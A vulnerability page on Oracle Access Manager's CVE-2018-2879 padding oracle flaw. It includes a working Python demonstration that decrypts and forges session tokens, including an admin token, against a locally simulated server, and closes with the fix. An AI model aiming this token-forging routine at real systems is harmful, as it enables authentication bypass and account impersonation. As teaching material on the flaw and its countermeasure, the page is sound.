
Oracle Access Manager (OAM)

Product
Base system (platform): Oracle Fusion Middleware
Developer: Oracle
Technology: Cybersecurity - Authentication

2018

A vulnerability (CVE-2018-2879) has been found in Oracle Access Manager (OAM) that allows a padding oracle attack. Using it, an attacker can bypass the authentication mechanism and impersonate the owner of any user account. The vulnerability lies in the cryptographic format used by OAM and affects OAM 11g and 12c.

OAM is a component of the Oracle Fusion Middleware platform that provides authentication for web applications of various kinds. Typically the web server that fronts the application is equipped with an authentication component (Oracle WebGate). A user who requests a protected resource from the web server is redirected to OAM for authentication. OAM authenticates the user (by username and password) and redirects them back to the web application. Because authentication is centralized, a user needs to authenticate only once to gain access to any application protected by OAM.

According to researchers at SEC Consult, OAM contains a vulnerability that allows an attacker to encrypt and decrypt the data exchanged between OAM and the web servers. Using it, the researchers were able to construct a valid session token, encrypt it, send it to the web server and obtain access to protected resources as if they were a user already authenticated by OAM.
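The mechanics behind that claim are the classic CBC padding oracle: a server that decrypts a ciphertext and reveals, through an error or a timing difference, whether the PKCS#7 padding was valid lets an attacker recover the block cipher's output for any chosen block without the key. Recovering those blocks backwards through the CBC chain then lets the attacker *encrypt* an arbitrary plaintext, which is exactly what forging a session token requires. The following is an added example written for this page, not code from SEC Consult, Oracle or OAM, and it makes no claim about OAM's actual token layout. To run offline with only the standard library it uses a small HMAC-SHA256 Feistel network as a stand-in 128-bit block cipher in place of AES (an assumption: the attack does not depend on which block cipher sits under CBC). The token contents (`user=alice;role=user`) and the `make_padding_oracle` server stand-in are constructed for the demonstration.

```python
import hashlib
import hmac
import os

BLOCK = 16


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


# --- stand-in 128-bit block cipher: 4-round Feistel with HMAC-SHA256 round function ---
def _round(key: bytes, i: int, half: bytes) -> bytes:
    return hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[:8]


def block_encrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:8], block[8:]
    for i in range(4):
        l, r = r, _xor(l, _round(key, i, r))
    return l + r


def block_decrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:8], block[8:]
    for i in reversed(range(4)):
        l, r = _xor(r, _round(key, i, l)), l
    return l + r


# --- PKCS#7 padding and plain (unauthenticated) CBC, the weak construction ---
def pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def unpad(data: bytes) -> bytes:
    if not data or len(data) % BLOCK:
        raise ValueError("bad padding")
    n = data[-1]
    if n < 1 or n > BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def cbc_encrypt(key: bytes, iv: bytes, padded: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, _xor(padded[i:i + BLOCK], prev))
        out += prev
    return out


def cbc_decrypt(key: bytes, iv: bytes, ct: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        blk = ct[i:i + BLOCK]
        out += _xor(block_decrypt(key, blk), prev)
        prev = blk
    return out


def make_padding_oracle(key: bytes):
    """Server side (constructed): answers only 'padding valid?' for an iv||ciphertext token."""
    def oracle(token: bytes) -> bool:
        try:
            unpad(cbc_decrypt(key, token[:BLOCK], token[BLOCK:]))
            return True
        except ValueError:
            return False
    return oracle


# --- attacker side: only the oracle is available, never the key ---
def recover_intermediate(oracle, block: bytes) -> bytes:
    """Recover block_decrypt(key, block) one byte at a time by forging the preceding block."""
    inter = bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        padval = BLOCK - pos
        forged = bytearray(BLOCK)
        for j in range(pos + 1, BLOCK):
            forged[j] = inter[j] ^ padval  # already-known bytes set to produce padval
        for guess in range(256):
            forged[pos] = guess
            if not oracle(bytes(forged) + block):
                continue
            if pos == BLOCK - 1:
                # Edge case: an accidental \x02\x02 (or longer) ending also validates.
                # Flip the byte to the left; a genuine \x01 stays valid, the others break.
                forged[pos - 1] ^= 0xFF
                still_ok = oracle(bytes(forged) + block)
                forged[pos - 1] ^= 0xFF
                if not still_ok:
                    continue
            inter[pos] = guess ^ padval
            break
        else:
            raise RuntimeError("oracle never accepted a guess; not a padding oracle?")
    return bytes(inter)


def oracle_decrypt(oracle, token: bytes) -> bytes:
    """Decrypt iv||ciphertext using only padding-validity answers."""
    iv, ct = token[:BLOCK], token[BLOCK:]
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        blk = ct[i:i + BLOCK]
        out += _xor(recover_intermediate(oracle, blk), prev)
        prev = blk
    return unpad(out)


def oracle_encrypt(oracle, plaintext: bytes) -> bytes:
    """Forge iv||ciphertext for a chosen plaintext: pick the last block, walk the chain backwards."""
    padded = pad(plaintext)
    blocks = [padded[i:i + BLOCK] for i in range(0, len(padded), BLOCK)]
    cur = os.urandom(BLOCK)  # arbitrary final ciphertext block
    chain = [cur]
    for p in reversed(blocks):
        cur = _xor(recover_intermediate(oracle, cur), p)  # previous block (or IV)
        chain.append(cur)
    chain.reverse()
    return b"".join(chain)


SERVER_KEY = os.urandom(32)  # secret on the server; the attacker never reads it


def demo():
    oracle = make_padding_oracle(SERVER_KEY)
    iv = os.urandom(BLOCK)
    real_token = iv + cbc_encrypt(SERVER_KEY, iv, pad(b"user=alice;role=user"))  # constructed
    leaked = oracle_decrypt(oracle, real_token)
    forged = oracle_encrypt(oracle, b"user=admin;role=admin")
    accepted_as = unpad(cbc_decrypt(SERVER_KEY, forged[:BLOCK], forged[BLOCK:]))
    return leaked, accepted_as


if __name__ == "__main__":
    print(demo())
```

Each recovered block costs at most 16 × 256 oracle queries, so forging a two-block token is a few thousand requests. The countermeasure is independent of the product: authenticate the ciphertext (AES-GCM, or encrypt-then-MAC with the tag checked before any decryption) so that a tampered token is rejected with one uniform error and there is no padding answer left to observe.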

OAM administrators are strongly advised to install the update that fixes this vulnerability. A demonstration of the attack is shown in the video below.